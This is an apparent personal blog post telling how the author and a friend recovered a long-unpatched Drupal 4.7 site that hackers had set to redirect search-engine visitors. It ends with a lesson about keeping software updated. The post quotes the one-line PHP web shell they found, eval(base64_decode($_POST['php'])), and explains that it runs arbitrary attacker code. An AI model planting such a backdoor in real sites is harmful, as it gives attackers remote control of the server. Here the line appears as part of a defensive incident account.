What A Hacked Drupal Site Taught Me

inShare It was several month ago. Autumn was getting fairly colder as winter was almost in its domain. One rainy evening I got a call from my friend who was asking for some assistance. His ancient site was somehow hacked which is strange as the site was made with Drupal. We did manage to work the things out but those were some lousy days, honestly. The previous state of the site was restored quickly, yes. But the problem remained. Through our attempts of restoring justice we’ve gained tremendous experience. And that is actually the best thing about the entire story. Why was it hacked? We still do not actually know why somebody has even bothered hacking my friend’s site. It did not have that many visitors. The entire whole thing was a training platform for my friend several years ago and has like zero of commercial value. The site was created like six years ago or so and was never updated. There was no actual reason to actually update it, thus it was still running on Drupal 4.7. The site itself does not require users to actually log in in order to post pictures or text. That ads some difficulty for hacker security to be properly maintained. With the combination of the following the site was eventually hacked for an unknown reason. Hack type Whenever any user was typing in the sites correct address into their browser all was as smooth as ever. They made it to their destination, were able to navigate or whatever they usually do. No problem here. But if somebody was searching for it via Google or whatever other search engine the appropriate link was redirecting him to the hacker’s website. The hacks very nature made it hard to detect. You don’t use Google to find your own site, right? Salvation! For starters we’ve done some upgrading and now everything is running on Drupal 7. I won’t be telling much about that part since it will take for like a dozen of blog posts. That did help. For like two weeks, after which the site was hacked again. Then we began systematic elimination of all the possible threats. We’ve been doing some database password changes as well as FTP password changes and even Drupal credentials for logging in. All the php and script were cleaned up as well as Perl strings. And every morning we saw a newly hacked site, it was like an actual curse of some sort. And then we have found this nasty little php file with but one line of code! That was it, victory! For those interested that line was “eval(base64_decode($_POST[“php”]))” . After it was removed all went back to stability and cold weather. If you are wondering what that small code line is capable of I’ll tell you. If you do not I will still tell. It grants allowance for the person aware of its location to attach any possible desired php code as the key value in the very attribute string of any URL. If shorter – the hacker is free to run practically any php code his black heart may desire. What have we both learned eventually? The site was originally vulnerable due the fact it was long not updated. After we’ve made it running on Drupal 7 all went smooth as well as safer. The only thing left was to find and eliminate the malware that was already there. As it was done nothing was going unusual ever since for quite a while now. The lesson that we’ve learned was that keeping older versions is like playing with fire. It may cost way more than on time updating. Good luck, everybody, play nice and be up-to-date!